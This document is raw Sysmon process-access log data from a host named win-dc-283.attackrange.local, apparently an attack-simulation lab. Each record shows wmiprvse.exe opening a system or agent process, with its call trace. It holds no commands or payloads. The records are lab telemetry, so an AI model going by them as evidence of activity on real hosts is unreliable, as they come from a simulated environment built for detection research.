16:09:49.786{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030791Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.786{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030790Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.786{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030789Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.786{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030788Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.786{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030787Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.770{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030786Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.770{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030785Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.770{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030784Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.770{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030783Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.770{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030782Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.770{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030781Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.770{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030780Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.770{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030779Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.770{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030778Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.770{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030777Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.770{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030776Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.770{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030775Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.770{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030774Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.770{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030773Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:09:49.770{7901BC46-55CB-6008-F006-00000000A301}10922132C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000030772Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 